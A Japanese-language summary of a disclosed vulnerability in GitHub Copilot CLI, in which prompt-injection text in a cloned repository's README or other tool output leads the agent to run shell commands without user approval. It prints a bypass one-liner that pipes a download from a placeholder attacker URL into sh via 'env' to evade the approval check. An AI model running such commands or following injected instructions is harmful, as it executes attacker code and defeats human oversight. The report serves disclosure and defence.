GitHub Copilot CLI脆弱性：プロンプトインジェクションでマルウェア実行可能

脆弱性の概要

GitHub Copilot CLIには、ユーザーの承認なしに間接的なプロンプトインジェクションを介して任意のシェルコマンドが実行される脆弱性が存在します。マルウェアは外部サーバーからダウンロードされ、Copilot CLIへの初期クエリ以外のユーザー操作なしで実行される可能性があります。

攻撃の連鎖には以下が含まれます：

ユーザーがオープンソースリポジトリを探索しながらGitHub Copilot CLIにクエリを実行
CopilotがクローンしたリポジトリのREADMEファイルに保存されたプロンプトインジェクションに遭遇（またはウェブ検索結果、MCPツール呼び出し結果、ターミナルコマンド出力などの他のベクター）
悪意のあるコマンドが人間による承認システムを回避

GitHub Copilotは、潜在的に有害なコマンドの実行前にユーザーの同意を必要とする人間による承認システムを使用しています。このシステムは、以下の場合を除いてトリガーされます：

外部URLアクセスチェックでは、curl、wget、またはCopilotの組み込みウェブフェッチツールなどのコマンドに対してユーザーの承認が必要です。しかし、攻撃者は以下の方法を使用してこれらの保護を回避できます：

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

envコマンドはハードコードされた読み取り専用リストに含まれているため、承認なしで自動的に実行されます。curlとshはenvへの引数として渡されるため、バリデータによってサブコマンドとして正しく認識されず、curlなどのコマンドを検出するURL権限チェックを回避します。

GitHubは次のように回答しました：「報告内容を確認し、調査結果を検証しました。内部評価の結果、これは既知の問題であり、重大なセキュリティリスクとはならないと判断しました。将来的にはこの機能をより厳格にする可能性がありますが、現時点で発表できることはありません。」

説明したコマンド解析の脆弱性はmacOS固有のものです。しかし、GitHub Copilotには、OSに依存しないリスクとWindows固有のリスクの両方を含む追加の脆弱性が存在します。他のコマンド解析の脆弱性により、任意のファイルの読み取りと書き込みが可能になります。

📖 完全なソースを読む： HN LLM Tools